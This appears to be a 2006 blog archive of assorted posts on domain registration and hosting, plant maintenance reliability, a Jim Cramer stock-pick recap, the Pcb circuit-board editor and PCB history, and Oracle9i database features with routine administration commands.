So whose names are listed in the "control" spots? Nine times out of ten, it is a person within the organization you purchased your domain name from. Any inquiries about billing, technical issues and administrative questions are sent to this arbitrary person. The domain name registration company has FULL control over your URL. What does this mean?
Even though you are the owner, and you make a request for changes, the confirmation request will go to the administrator for verification. This person has the full authority to approve or reject changes to your domain name.

The Dangers

Keep one thing in mind, domain registrars can, and do, go out of business. They get bought and sold just like other organizations. They are not legally required to notify you of any changes within their firm. This fact alone can cause unlimited problems with renewals, changes, sales or transfers. But that's not all.

Let's say you put in a domain transfer request. A time sensitive confirmation will be sent from the registrar of your domain name to the administrative contact. This confirmation must be answered within a certain timeframe. Now, if the administrative contact is someone at the business you purchased your domain name from we could have a serious problem. That person might be on vacation, sick, fired, or even under orders not to respond. In any case, your transfer will be denied. Think it doesn't happen. I'm horrified to tell you it does - every single day.

What does the technical contact control? Basically, where your Web site "lives." What happens if you submit a hosting transfer request and your technical contact (not you - someone at the business you got your domain name from) does not respond to the message? Your domain name is trapped! Worse case scenario… your site is down for days or weeks because your Web site lives at one place, and your domain name lives somewhere else.

And finally, the billing contact. At some point it will be time to renew your domain name registration. Most registrars send a notice to the billing contact 30 days before the payment is due. For whatever reason, the person listed as the billing contact does not contact you about the renewal. You just lost your domain name due to expiration!

Your Domain Name Is Being Held Hostage

When a domain name registration company forces itself into the contact fields of your registration records, it's commonly know as being "held hostage."

I personally know of countless horror stories of online business owners who have fought tirelessly to "free" their domain names and regain control. They will be glad to tell you the woes of losing control of your URL. So what do you do about it? How do you get back full control of your business?

Steps To Take

Make sure when you register a domain name that the registrant, administrative, technical and billing contacts are in your name. Just as soon as you receive confirmation and access information, log in and change any "forced" contact information to your name.

Use a contact email address you will always have. A good one is the one associated with your domain name. The email address on record must match the email address you are sending a request from. If you use an email associated with your ISP (@hotmail.com, @rr.sc.com, @earthlink.com) and later change ISPs, you'll have to make contact information corrections prior to making any transfers, etc.

And lastly, if at all possible, register with a company that provides you with a management or control center. This is - without a doubt - the safest way to go.

·You won't have to wait for someone else to make needed changes.
·You won't have to ask anyone for permission to make changes.
·You will never be denied the changes you need to make.
·You won't lose your domain name because the company listed as "contact" closed or was bought out.
·You won't lose your domain name because you weren't notified of the renewal date.
·You WILL be in full control of the most important part of your company - your domain name.

Take back control of your domain name today. Make the necessary adjustments to the contacts on record so that your URL can never be held hostage.

What is a domain name and why would I want one?

2006-09-15T11:07:00.000+07:00

In this article we will cover the basics of what a domain name is, how they work and why you need to have at least one. I am going to try and avoid complicated computer terms and stick to explanations that should be easily understood by someone without a computer science degree.

What is a Domain Name? Before we can go into what a domain name is I'm going to tell you why we need them as the answers compliment each other. The Internet is just a really big collection of connected computers (a network). For the purpose of explaining domain names you can think of the Internet a bit like the phone system and just like the phone system every computer on the Internet has it's own phone number except an Internet phone number is called an IP addresses. This address is made up of up to 12 digits in the form 123.123.123.123, computers use these IP addresses to send information to each other over the Internet.

When the Internet was first created it quickly became clear that these IP addresses were not easy to remember and another method was need to make these addresses more human friendly. The solution to this was the Domain Name System (DNS). Basically the DNS is a really really big phone book for computers. When you type a web site address into your web browser it checks the DNS for that website name and finds the IP address. Once it has the IP address it can then send a message to that computer and ask it for the web page you wanted.

Ok so you know a domain name is part of a web site address but which part? Lets look at a website address so we can identify and discuss what bit of it is a domain name.
http://www.itxcel.com/index.html

The above address is the home page of the itXcel web site. It can be split into 3 main parts. The first part is http:// this just tells your web browser what kind of information it is going to get and how to get it. The last part is /index.html this is name of the files on the remote computer that you want your browser to get. The bit in the middle www.itxcel.com is a domain name. This is the name that your computer sends to the DNS to get back the IP address.

So you know what a domain name is and that there is a phone book called the DNS to change your easy to remember domain name into an IP address that you computer can understand. The Internet phone book (DNS) is special in that everyone on the Internet needs to be able to use it. This makes the DNS very very big (100+ million addresses big). Due to the size of this phone book it needed to have a carefully organised and managed structure.

Domain names themselves are split into different levels like a hierarchy. The DNS system uses this hierarchy to search the DNS for the IP address of the domain name it is trying to find. The last bit of a domain, in the previous example the com part is called the top level domain. There are a large selection of top level domains like com, net, org and info. There are also very similar endings called country level domains like uk and de. Each of the top level and country level domains are managed by a different organization, sometimes these are companies or non profit organizations and sometimes governments. In the domain business these organisations are referred to as the registries. Each registry looks after it's own part of the domain name system.
If you decide you want to use a domain name in the top level domain com, like mycompany.com you would have to have this name assigned by the registry that manages that top level domain (for .com a US company called VeriSign). The process of being assigned a domain name is called domain registration.

Domain registration is more like a lease than a purchase. You are renting the second level domain (the mycompany bit) from Verisign for a specific amount of time normally between 1 and 10 years at a time. Most of the organizations that allow you to register a second level domain charge a fee for each year that you register the domain for. With almost all domain names you are also given the option to renew your registration (lease) when it is close to running out (expiring).

Once you have registered a second level domain you are free to create as many third level domains (sometimes called sub domains) as you like. In our previous example the www is a sub domain of itxcel.com

Most of the registries that manage these top level domain names do not allow individuals or businesses to register domains directly with them. To register a domain you need to use a company like itXcel. We act as a registrar and send all the required information and the registration fee to the registry. Registrars are useful as they hide the differences that exist in each of the registries from the customer and provide a simple step by step process for registering a domain. A registrar also allows you to manage and track all your domains from one place rather than having to deal with a different company for each top level domain.

OK so I know what a domain name is, Why do need one? Can you image what a nightmare it would be if you had an email address like myname@123.246.128.255 or a web site address http://123.246.128.255/. These addresses are possible but not very easy to remember. Now if you register a domain name you could create an email address like myname@mycompany.com and a web site address like http://mycompany.com These are much easier to remember and look 100 times more professional.

One of the important points about registering a domain is that once done you have an exclusive right to use that domain for as long as you keep the domain registered in your name. If you do not renew a domain at the end of it's registration period it will again become available for registration by someone else. For this reason even if you don't want or need a web site at the moment, it's still a good idea to register a domain as soon as possible. Just imagine if your competition registered the domain name of your company or product. Although there is a process in place to retrieve these domain it can be long and complicated. It is definitely simpler to spend a little money up front to secure your chosen domain names.

To find out what domains are available and to quickly and cheaply register them visit http://www.itxcel.com now and enter your desired name in the domain search box.

Web Site Basics

2006-09-15T11:03:00.000+07:00

the web or internet is an exciting place, but can seem very daunting to the novice web designer.
You want to get a web site up and live, how is it done, and how can it be done cheaply?

Domain Names

The first step is to select a domain name, try and choose a name that is easy to remember, short, and if possible one that describes your website.

Nearly all the obvious domain name have gone, so you may need to use your imagination!

There are many domain name registration services such as my own site www.discountdomainsuk.com on the web. All domain names are created by the Top Level Domain providers such as Nominet in the UK so there is no great advantage in paying over the top for your domain name. Look for a company that offers telephone support, e-mail only can be frustrating.

Web Hosting
Next you will need some space on the web to publish or host your website. If you have a broadband or ADSL connection, you can use this to host your own site. It does of course mean that you can’t switch off your machine.
To point a domain name at a site hosted in this way you need to have a static IP address and look for an IP pointing option in your domain name registrars control panel. This is usually called the domains Zone Records.
Mostly everyone uses a third party hosting company; once again there are loads to choose from including my own service at www.discountdomainsuk.com
Select the hosting package that best matches your requirements and budget. It’s usually best to start with a basic package than upgrade, hosting companies make most of their money by selling you space which you then don’t use.
Your hosting company will provide you with a username and password to allow you to FTP, File Transfer Protocol your site to the hosting space.
If you’re using a hosting company other than your domain name registrar, you will need their Primary and Secondary DNS or Domain Name Settings, which take the form of domain names e.g.
Ns1@asdasdasd.co.uk
Ns0@asdadadsa.co.uk

Web Design
A great package to start out web designing is MS FrontPage; it follows the format of the rest of the Microsoft office suite and is very reasonably priced and easy to pick up.
Once you’ve progressed with FrontPage then a more professional and sophisticated package to try is Macromedia Dreamweaver.
Once you have designed a site then simply select the publishing option, enter the domain name, your user name and password, and your site will FTP to your web-server.

Summary
That’s all there is too it. Getting a website up and live can be done in a matter of minutes, its worth mentioning that a new domain name and DNS changes can take up to 48 hours to get picked up by the worldwide DNS system.

Register Domain Names One Year At A Time!

2006-09-15T11:00:00.000+07:00

I first heard about this money saving news from a press release that wound
up in my inbox. I haven't heard it posted anywhere else so I decided to do a
little digging on my own, and do what I can to spread the good news.

Effective January 15, 2000, the restriction of registering domain names for
two years at a time has been lifted. You can now register domain names from
one to ten years, in one year increments, up to a maximum of ten years. The
following text is taken directly from the ICANN NSI-Registrar License and
Agreement, located at:

http://www.icann.org/nsi/nsi-rla-04nov99.htm

2.3. New Architectural Features. NSI will use its best commercial efforts to
develop and implement two additional modifications to the Licensed Product
by January 15, 2000 as follows:

2.3.1. NSI will issue an upgrade to the Licensed Product that will enable a
Registrar to accept initial domain name registrations or renewals of a
minimum of one year in length, or in multiples of one year increments.

2.3.2. NSI will issue an upgrade to the Licensed Product that will enable
registrars to accept the addition of one additional year to a registrant's
"current" registration period when a registrant changes from one registrar
to another.

In no event shall the total unexpired term of a registration exceed ten (10)
years.

So there you have it folks, right from ICANN themselves. If you have a lot
of domain names - like me - you may want to keep them reserved one a year at
a time, to keep your costs down. Or, if you have a company name not likely
to be sold in the future, you can register it for 10 years at a big savings
off of the regular price.

After digging and digging around, at several ICANN accredited registrars, I
was hard pressed to find even one that allowed anything but the old two year
registrations. I did finally find one Canadian company that does one to ten
year registrations (partnered with Melbourne IT an ICANN accredited
registrar). The fact that they have a shopping cart to allow multiple
registrations and a real time database is just the icing on the cake.

https://secure.kudosnet.com/domain/k2/r.dmc/

With 21 domain names to register, I'm happy to say that I saved over $600 US
by being able to register them for a single year, instead of two, and I
submitted them all with a single mouse click.

cheap hosting domain

2006-09-14T17:51:00.000+07:00

Web hosting provides domain registration and ssl certificates and other cheap web hosting services for all types of web page hosting needs. Website hosting plans include PHP hosting, MySQL hosting, PostgreSQL web hosting, FrontPage hosting, CGI Hosting, SSH Web Hosting, Web Space Hosting, PHPBB Hosting, PHPNuke Hosting, Domain names registration, Webmail Hosting / Pop3 Web Hosting / Email Web Hosting, Image web hosting, Internet web hosting, Foto & Gallery Hosting, New Zealland web hosting, Custom Mime types and error pages, Python Web Hosting, Perl, CGI web hosting, SSH hosting, Zend, Sablotron, SSI, Webmail hosting, Forum Web Hosting, Blog Hosting, Email Hosting SMTP, IMAP, pop3, Secure personal web hosting and lots more.

Try
http://www.cheapwebhosting.co.nz/
http://www.hostingdude.com/

Maintenance Management

2006-09-14T08:40:00.000+07:00

The purpose of this column is to raise questions and challenge plant leadership on strategy, vision and execution of reliability and maintenance management. Since the name of this magazine is Reliable Plant, I think it would be interesting for my first column to challenge you on the meaning of the term “reliability.”

Reliability is often used by plants to define future improvement efforts and set expectations for employees and managers. In several recently written mission statements, I’ve seen expressions such as “to increase profitability through increased reliability.” But when companies are asked to define what the words mean, what reliability is and how it’s measured, it’s unusual to get a comprehensive answer.

The manufacturing and process industry may not have defined the meaning of the word reliability, but you would think the service sector would have done so by now. It has not. Consultants start the trends and use these words in order to sell the industry a new concept. We sometimes, however, fail to define the meaning of the terms we invent.

The goal for any plant is to increase overall production reliability, meaning the maximization of output with current resources by reducing waste in equipment reliability and process reliability (the latter is often used in process industry; it may be called “manufacturing reliability” in discrete manufacturing). Equipment and process reliability jointly create reliable production.

This can be measured using overall production reliability (OPR). Traditionally, this measurement is called overall equipment effectiveness (OEE). OEE and OPR refer to the same measurement, but I use the name OPR since it better describes what is actually measured. It should be called OPR because it includes all possible production-related waste, not only equipment-related waste.

OPR is calculated as:

OPR = Quality (%) x Speed (%) x Time Availability (%)

Speed, Time Availability and Quality describe all losses in a production or process line. OPR is, therefore, an excellent measurement to use when setting reliability goals jointly for operations, maintenance and engineering.

Operations’ primary responsibility is process reliability, where the process, or manufacturing, is operating with as little waste as possible. Examples of process waste are quality and production losses due to operating parameters such as setting of pressures, machine speeds, cutting tool selection or concentration of chemicals.

Maintenance’s primary responsibility is equipment reliability. Lack of equipment reliability creates waste due to failing components, quality losses for the reason of equipment problems, or speed losses because of component wear or breakdowns.

Engineering should focus on supporting equipment and process reliability through life cycle cost (LCC) design. LCC is used to consider the cost of buying and owning equipment. It’s common that engineering departments only focus on making sure a new installation is on time and under budget. Reliability and maintainability aspects of the equipment design are forgotten. For example, why would someone buy a motor or gearbox without jacking bolts (pushbolts used when aligning equipment) installed?

We know world-class shaft alignment is virtually impossible to do with a sledgehammer, so why don’t we specify jacking bolts as part of the design?

In conclusion, most companies need to better specify the term reliability. It will help employees understand what the goal is when we refer to, for example, “production reliability.”

In maintenance management, we primarily focus on equipment reliability. In my next column, we’ll discuss how plant maintenance management can set goals by clarifying “equipment reliability” for their co-workers.

Money In-Depth Stock Picks

2006-09-14T08:27:00.000+07:00

Stocks discussed in the in-depth session of Jim Cramer’s Mad Money TV program, Friday September 8. Click on a stock ticker for more analysis:

Baby Boom: Kimberly-Clark (KMB)

Cramer appeared on his show sporting a diaper to emphasize how much he believed in KMB, not just for its consumer products which are necessary no matter how the economy is behaving but also because it is a play on oil since petroleum is used in the production of diapers. As the price of oil decreases, comments Cramer, KMB should improve especially since $300 million to $350 million of cost inflation built into its 2006 numbers is mostly due to oil. As raw costs go down, says Cramer, KMB will go up.

Related: Catablast Media's discussion of the effect of the new baby boom and increased diaper demand on Kimberly-Clark.

Go to the Tape: Deere's (DE)

In a new segment of Mad Money called "Go the Tape," Cramer used Deere as an example of a stock which declined and came back. In spite of a good quarter, DE dropped $3 because it reported slowing construction. However, those who listened to the conference call would have noticed that inventory was low and that Deere is an agriculture play and is not connected with housing as many people believe. Because expectations were low and the stock was shorted DE bounced back. Cramer said that the Deere story teaches investors to look for three things: "Aggressive shorting during options expiration week, companies that tamp down expectations and have upside surprises, and misinformation about business cycles."

Goldman Sachs (GS), Lehman Brothers (LEH), and Bear Stearns (BSC)

These three companies report earnings next week and "could provide a really super trading backdrop," Cramer said. Expectations are low for this sector and that is a reason pay attention, according to Cramer, because these companies should get a boost in September after people return from vacation and start trading. Of the three, Cramer prefers GS because it is "cheap and ready to roll" and advises purchasing September $1.50 call options on GS; "They should be cheap because they expire at the end of the week," Cramer said. "Don't buy all at once. Buy a quarter on Monday, a quarter on Tuesday, and if the stock goes down, you double down."

Related: Eli Hoffman comments on the recent pullback in brokerage stocks.

CEO Interview: Devon Energy (DVN) Chairman and CEO Larry Nichols

In addition to recent discovery in the Gulf of Mexico Larry Nichols says that Devon has three other potential finds "in the pipeline" and is second only to Chevron (CVX). When Cramer asked how he makes sense of Wall Street, Larry Nichols replied, "there is a time when people are going to talk about oil going down, and there will be brief lulls when it does," and added that since oil sources are often policital hotspots, "there is only a matter of time before another problem comes up and the price shoots back up."

Seeking Alpha publishes a summary of Jim Cramer's stock picks every day including: Mad Money Recap, Lightening Round, Stop Trading and his Radio Show.

Pcb

2006-09-12T14:19:00.000+07:00

Pcb is a handy tool for laying out printed circuit boards.
Pcb was first written by Thomas Nau for an Atari ST in 1990 and ported to UNIX and X11 in 1994. It was not intended as a professional layout system, but as a tool which supports people who do some home-developing of hardware.
The second release 1.2 included menus for the first time. This made Pcb easier to use and thus a more important tool.
Release 1.3 introduced undo for highly-destructive commands, more straightforward action handling and scalable fonts. Layer-groups were introduced to group signal-layers together.
Release 1.4 provided support for add-on device drivers. Two layers (the solder and the component side) were added to support SMD elements. The handling of libraries was also improved in 1.4.1. Support for additional devices like GERBER plotters started in 1.4.4. The undo feature was expanded and the redo-feature added in 1.4.5.
harry eaton took over pcb development beginning with Release 1.5, although he contributed some code beginning with Release 1.4.3
Release 1.5 provides support for rats-nest generation from simple net lists. It also allows for automatic clearances around pins that pierce a polygon. A variety of other enhancements including a Gerber RS-274-X driver and NC drill file generation have also been added.
Release 1.6 provides automatic screen updates of changed regions. This should eliminate most of the need for the redraw ((R key). Also some changes to what order items under the cursor are selected were made for better consistency - it is no longer possible to accidentally move a line or line point that is completely obscured by a polygon laying over top of it. Larger objects on the upper most layers can be selected ahead of smaller objects on lower layers. These changes make operations more intuitive. A new mode of line creation was added that creates two line on 45 degree angles with a single click. The actual outline of the prospective line(s) are now shown during line creation. An arc creation mode was added. Drawn arcs are quarter circles and can be useful for high frequency controlled impedance lines. (You can have eighth circle arc if the source is compiled with -DARC45, but be aware that the ends of such arcs can never intersect a grid point). Two new flags for pins and vias were created - one indicates that the pin or via is purely a drill hole and has no copper annulus. You can only toggle this flag for vias - for elements, it must be an integral part of the element definition. The other flag controls whether the pad will be round or octagonal. There is also now a feature for converting the contents of a buffer into an element.
Release 1.6.1 added the ability to make groups of action commands bound to a single X11 event to be undone by a single undo. Also a simple design rule checker was added - it checks for minimum spacing and overlap rules. Plus many fixes for bugs introduced with the many changes of 1.6
Release 1.7 added support for routing tracks through polygons without touching them. It also added support for unplated drill files, and drawing directly on the silk layer. A Netlist window for easily working with netlist was also added.
Release 2.0 adds an auto-router, a new simpler library mechanism, much improved support for graphically creating (and editing) elements, viewable solder-mask layers (and editing), snap to pins and pads, netlist entry by drawing rats, element files (and libraries) that can contain whole sub-layouts, metric grids, improved user interface, a GNU autoconf/automake based build system, and a host of other improvements.

Special thanks goes to:

Thomas Nau (who started the project and wrote the early versions).
C. Scott Ananian (who wrote the auto-router code).
Bernhard Daeubler (Bernhard.Daeubler@physik.uni-ulm.de)
Harald Daeubler (Harald.Daeubler@physik.uni-ulm.de)
DJ Delorie (djdelorie@users.sourceforge.net)
Larry Doolittle (ldoolitt@recycle.lbl.gov)
Dan McMahill (danmc@users.sourceforge.net)
Roland Merk (merk@faw.uni-ulm.de)
Erland Unruh (Erland.Unruh@malmo.trab.se)
Albert John FitzPatrick III (ajf_nylorac@acm.org)
Boerge Strand (borges@ifi.uio.no)
Andre M. Hedrick (hedrick@Astro.Dyer.Vanderbilt.Edu)
who provided all sorts of help including porting Pcb to
several operating systems and platforms, bug fixes, library enhancement, user interface suggestions and more. In addition to these people, many others donated time for bug-fixing and other important work. Some of them can be identified in the source code files. Thanks to all of them. If you feel left out of this list, I apologize; please send me an e-mail and I'll try to correct the omission.

Overview
Pcb is a printed circuit board editor for the X11 window system. Pcb includes many professional features such as:
Up to 8 copper layer designs
RS-274-X (Gerber) output
NC Drill output
Centroid (X-Y) data output
Postscript and Encapsulated Postscript output
Autorouter
Trace optimizer
Rats nest
Design Rule Checker (DRC)
Connectivity verification
Pcb is Free Software
Can interoperate with free schematic capture tools such as gEDA and xcircuit

PCB history

2006-09-11T20:50:00.000+07:00

The inventor of the printed circuit was probably the Austrian engineer Paul Eisler (1907–1995) who, while working in England, made one circa 1936 as part of a radio set. Around 1943 the USA began to use the technology on a large scale to make rugged radios for use in World War II. After the war, in 1948, the USA released the invention for commercial use. Printed circuits did not become commonplace in consumer electronics until the mid-1950s, after the Auto-Sembly process was developed by the United States Army.

Before printed circuits (and for a while after their invention), point-to-point construction was used. For prototypes, or small production runs, wire wrap can be more efficient.

Originally, every electronic component had wire leads, and the PCB had holes drilled for each wire of each component. The components' leads were then passed through the holes and soldered to the PCB trace. This method of assembly is called through-hole construction. In 1949, Moe Abramson and Stanilus F. Danko of the United States Army Signal Corps developed the Auto-Sembly process in which component leads were inserted into a copper foil interconnection pattern and dip soldered. With the development of board lamination and etching techniques, this concept evolved into the standard printed circuit board fabrication process in use today. Soldering could be done automatically by passing the board over a ripple, or wave, of molten solder in a wave-soldering machine.

However, the wires and holes are wasteful since drilling the holes is expensive and the protruding wires are merely cut off.

Instead of using through-hole parts, often 'surface mount' parts are used instead. See Surface-mount technology below.

Physical composition

Most PCBs are composed of between one and sixteen conductive layers separated and supported by layers of insulating material (substrates) laminated (glued with heat, pressure & sometimes vacuum) together.

Layers may be connected together through drilled holes called vias. Either the holes are electroplated or small rivets are inserted. High-density PCBs may have blind vias, which are visible only on one surface, or buried vias, which are visible on neither.

Substrates

FR-2

Low-end consumer grade PCB substrates frequently are made of paper impregnated with phenolic resin, sometimes branded "Pertinax". They carry designations such as XXXP, XXXPC, and FR-2. The material is inexpensive, easy to machine by drilling, shearing and cold punching, and causes less tool wear than glass fiber reinforced substrates. The letters "FR" in the designation indicate flame resistant.

FR-4
High-end consumer and industrial circuit board substrates are typically made of a material designated FR-4. This consists of a woven fiberglass mat impregnated with a flame resistant epoxy resin. It can be drilled, punched and sheared, but due to its abrasive glass content requires tools made of tungsten carbide for high volume production. Due to the fiberglass reinforcement, it exhibits about five times higher flexural strength and resistance to cracking than paper-phenolic types, albeit at higher cost.

PCBs for high power radio frequency (RF) work use plastics with low dielectric constant (permittivity) and dissipation factor, such as Rogers 4000, Rogers Duroid, Teflon type GT or GX, polyimide, polystyrene and cross-linked polystyrene. They typically have poorer mechanical properties, but this is considered an acceptable engineering tradeoff in view of their superior electrical performance.

Conductive Core

PCBs designed for use in vacuum or in zero gravity, as in spacecraft, being unable to rely on convection cooling, often have thick copper or aluminum cores to dissipate heat from electrical components.

Flex

Not all circuit boards use rigid core materials. Some are designed to be very flexible or slightly flexible, using DuPont's Kapton polyimide film and others. This class of boards, sometimes called flex circuits, or rigid-flex circuits, respectively, are difficult to create but have many applications. Sometimes they are flexible to save space (PCBs inside cameras and hearing aids are almost always made of flex circuits so they can be folded up to fit into the limited available space). Sometimes, the flexible part of the circuit board is actually being used as a cable or moving connection to another board or device. One example of the latter application is the cable connected to the carriage in an inkjet printer.

Ceramic/Metal Core

Power electronic applications require low-thermal resistivity substrates, with thick copper track to carry high currents. The main technologies are ceramic-based substrates (Direct Bonded Copper) and metal-based substrates (Insulated Metal Substrate).

PCB definition

2006-09-11T19:48:00.000+07:00

PCB:
Stands for "Printed Circuit Board." A PCB is a thin board made of fiberglass or a similar material. Electrical wires are "printed" onto the board, connecting the microprocessor to other components on the board. Some examples of PCBs include motherboards, RAM chips, and network interface cards.

Printed circuit boards are sometimes abbreviated as "PC boards," which is fitting, since the boards are commonly used in personal computers. However, PCBs are also found in other types of electronic devices, such as radios, televisions, and computer monitors. Because PCBs are relatively flat, they can also be used in thin devices such as laptops and portable music players.

Oracle Instructor's Guide to Oracle9i

2006-09-11T19:31:00.000+07:00

An Oracle Instructor's Guide to Oracle9i

Oracle claims that Oracle9i raises the competitive bar by which all future database servers will be judged. Oracle's latest release contains enhancements in virtually all areas of the database server, resulting in an Oracle database with improvements in scalability, availability, performance, manageability, multimedia datatype support and functionality. This article is not intended to be an all-inclusive list of features, but rather an overview of some of the more beneficial (and hopefully interesting) enhancements contained in this release.

The information on Oracle9i will be provided in three installments. In this article, we'll take a look at the following features: persistent initialization parameter files, remote startup/shutdown, database managed undo segments, resumable space allocation and flashback query.

Part two will cover external tables, tablespace changes, Oracle managed files, multiple block sizes and cache configuration, list partitioning, on-line table reorganization and index monitoring.

The last article in this series will cover RAC (Real Application Clusters), fail safe, data guard, fine-grained resource management, fine-grained auditing and label security.

With all of new features contained in this release, Oracle9i promises to be the most exciting Oracle release to date. This series will focus on what Oracle customers can look forward to when using the "latest and greatest" version of Oracle's flagship database product, Oracle9i.
Persistent Initialization Parameter Files

Oracle9i introduces on-line parameter changes that persist across database shutdowns and startups. This feature allows administrators to make changes to database initialization parameters and have them take affect immediately. In the past, these changes would require the administrator to edit the database's parameter file (initsid.ora). Because Oracle only reads the parameter file during startup, the changes would not take affect until the next time the database was shutdown and restarted.

In Oracle9I, a server-based parameter file, called a SPFILE, is used as the repository for initialization parameters. Oracle9i documentation now refers to the old initsid.ora parameter file as the PFILE. The SPFILE is initially created by using the PFILE (initsid.ora) parameter file as the source. It is important to note that the database is initially created using the old PFILE parameter file. Administrators then use the "CREATE SPFILE FROM PFILE" command to create the server-based parameter file. At system startup, the default behavior of the STARTUP command is to look for the SPFILE before it looks for the PFILE. The Oracle administration guides provide information on default location and naming conventions for server-based parameter files.

The administrator uses the ALTER SYSTEM statement to dynamically change initialization parameters. A parameter can be changed immediately or deferred until the next database startup. Although the majority of the parameters can be dynamically changed, there are a few configuration parameters that can only be changed by editing the old initsid.ora parameter file (PFILE).

Here are a few hints on PFILEs and SPFILEs:
Never, ever edit a SPFILE manually. Although you can view it in both UNIX and NT editors, editing it can produce a "less than desirable" outcome. The SPFILE was edited three times during our beta testing and the result was three database failures.
If you are required to edit the PFILE to change a static parameter, don't forget to execute the 'CREATE PFILE FROM SPFILE' statement to refresh the PFILE with all of the dynamic changes recorded in the SPFILE. Execute the SPFILE to PFILE refresh before you edit the PFILE. If you don't you could lose the dynamic changes recorded in the SPFILE. Remember, the database looks for the SPFILE first during startup, so you will need to execute the "CREATE SPFILE FROM PFILE" after you edit the PFILE to migrate your changes. If your PFILE doesn't have a record of all your dynamic parameter changes, you will lose them when you execute the 'CREATE PFILE FROM SPFILE' statement. The recommended procedure is to always execute the 'CREATE PFILE FROM SPFILE' command after dynamically changing a parameter to back up the changes recorded in the SPFILE to the PFILE.

Oracel9i provides a new static parameter called MAX_SGA_SIZE which specifies the maximum size of SGA for the lifetime of the instance. Another new Oracle9i parameter DB_CACHE_SIZE replaces DB_BLOCK_BUFFERS. DB_BLOCK_BUFFERS is still provided for backwards compatibility. DB_BLOCK_BUFFERS and the MAX_SGA_SIZE parameters are static so they can only be changed by editing the PFILE, then executing the 'CREATE SPFILE FROM PFILE' statement and restarting the instance.

During our testing, we found that the online changes to parameters worked well. We did find that changing SGA parameters produced some interesting results. We were able to dynamically alter the initialization parameters that affect the size of the buffer caches, shared pool, and large pool, but only to the extent that the sum of these sizes and the sizes of the other components of the SGA (fixed SGA, variable SGA, and redo log buffers) did not exceed the value specified by SGA_MAX_SIZE.

When we reduced memory from the data buffers by decrementing DB_CACHE_SIZE, Oracle allocated the memory saved to the shared pool. When we reversed the operation by reducing the memory allocated to the shared pool, Oracle allocated the freed memory to the data buffers.
Remote Startup/Shutdown

Oracle9i's persistent parameter files provide administrators with the ability to start an Oracle instance using SQL*Plus on remote clients.

Before we begin, some background information is in order. Oracle has been promising to desupport server manager and CONNECT INTERNAL for some time now. Administrators would use server manager on the host to connect to the database using the INTERNAL account to start and stop an Oracle instance.

Server manager and CONNECT INTERNAL are officially desupported in Oracle9i and are replaced by SQL*Plus and a special privilege called SYSDBA. SQL*Plus and SYSDBA have been available for some time but were never a primary means of starting and stopping an Oracle instance.

During an instance start, Oracle reads instance configuration parameters from a SPFILE or PFILE. In order to facilitate remote startup and shutdown, SQL*Plus is now able to reference the server-based parameter file (SPFILE) from remote clients. This solves the problem of propagating copies of the PFILE to all remote clients that require the ability to start an Oracle instance. By having all clients point to a single source, administrators can rest easy knowing the same parameters are used to configure the instance during each startup.

The steps to access a SPFILE from a remote client are as follows:

1. A server-based parameter file (SPFILE) is configured on the database server by executing the 'CREATE SPFILE FROM PFILE' command.

2. Create a parameter file on the remote client that contains a single line that references the server-based SPFILE:
spfile=/u01/app/oracle/product/9.0.0/dbs/spfiledemo1.ora

3. Start SQL*Plus without connecting to the database by executing:
SQL*PLUS /nolog

4. Connect to the remote instance as SYSDBA:
CONNECT username/password@connect_identifier AS SYSDBA

5. Start the instance by executing:
STARTUP PFILE=pfilename.ora

* where pfilename.ora is the parameter file name created in step 2.

Standard operating practice in UNIX environments is to embed STARTUP and SHUTDOWN commands in server manager to start and stop an Oracle instance. Shops migrating existing databases to Oracle9i should change the startup scripts from server manager to SQL*PLUS.
Database Managed Undo Segments

You don't have to be an Oracle expert to know that rollback segments can be "somewhat troublesome." Out of space conditions, contention, poor performance and the perennial favorite "snap shot too old" errors have been plaguing Oracle database administrators for over a decade. Oracle finally decided that the database could probably do a better job of managing before images of data than we could.

A transaction uses a rollback segment to record before images of data it intends to change. If the transaction fails before committing, Oracle uses the before images to rollback or undo the uncommitted data changes. Oracle also uses rollback segments for statement-level read consistency. Read consistency ensures that all data returned by a query comes from the same point-in-time (query start time). Lastly, rollback segments provide before images of data to help the instance roll back failed transactions during instance recovery.

In Oracle9i, administrators have their choice of continuing to manage rollback segments on their own (manual undo management) or configuring the database to manage its own before image data (automatic undo management). Oracle refers to system managed before image segments as undo segments.

Administrators must create a tablespace to hold undo segments by using the new UNDO keyword in the tablespace create statement:
CREATE UNDO TABLESPACE undots1
DATAFILE 'undotbs_1a.f'
SIZE 10M AUTOEXTEND ON;

The following initialization parameters are used to activate automatic undo management:
UNDO_MANAGEMENT - AUTO configures the database is to use automatic undo segments. MANUAL configures the database to use rollback segments.
UNDO_TABLESPACE - Specifies the tablespaces that are to be used to hold the undo segments. The tablespace must be created using the UNDO keyword. If no tablespace is defined, Oracle will select the first available undo tablespace. If no undo tablespaces are present in the database, Oracle will use the system rollback segment during startup. This value can be set dynamically by using the ALTER SYSTEM statement.
UNDO_RETENTION - specifies the amount of time that Oracle attempts to keep undo data available. This parameter becomes important when the Oracle9i flashback query option is used.

You cannot create database objects in undo tablespaces. It is reserved for system-managed undo data. The view DBA_UNDO_EXTENTS can be accessed to retrieve information relating to system managed undo data. For those of us familiar with V$ROLLSTAT, it is still available and the information reflects the behavior of the undo segments in the undo tablespace.

We found automatic undo management to be pretty reliable during our initial beta testing of Oracle9i. The key to success is to allocate sufficient disk storage to the undo tablespace and to set AUTOEXTEND on to allow the tablespace datafiles to grow automatically. During our beta testing, numerous heavy batch update jobs were simultaneously run to simulate heavy work loads. We found that the system managed undo segments worked as advertised. During performance comparisons, we did find that system managed undo segments did seem to add some extra processing time to the batch loads. We found that the rollback segment tablespace used in our comparison testing auto extended sooner than its system managed undo tablespace counterpart. One possible explanation is that the overhead can be attributed to the system managed undo segments performing additional actions to squeeze more undo data in the tablespace before giving up and auto expanding the undo tablespace datafile.
Resumable Space Allocation

Running update jobs that insert or update large amounts of data also cause their fair share of problems. Estimating the space required by large operations can be quite a formidable forecasting effort.

Do you add extra space to data and index tablespaces? Do you make the table and index INITIAL and NEXT extent sizes bigger? Do you increase the size of the rollback segments to handle the additional load? Should you increase the size of your TEMP tablespace and make your default INITIAL and NEXT extent sizes larger?

In previous releases, when an out of space condition occurs, the statement quit running and the database rolled back the unit of work. Rolling back can be a time-consuming (sometimes a VERY time-consuming) process. The DBA corrected the problem and the program was run again (hopefully successfully the second time). How many times have there been a third, fourth and fifth time?

Oracle 9i solves this problem with resumable statements. Oracle9i temporarily pauses SQL statements that suffer from out of space conditions (no freespace in tablespace, file unable to expand, maxextents or maximum quota reached). The DBA is able to easily identify the problem and correct the error. The statement will then resume execution until completion.

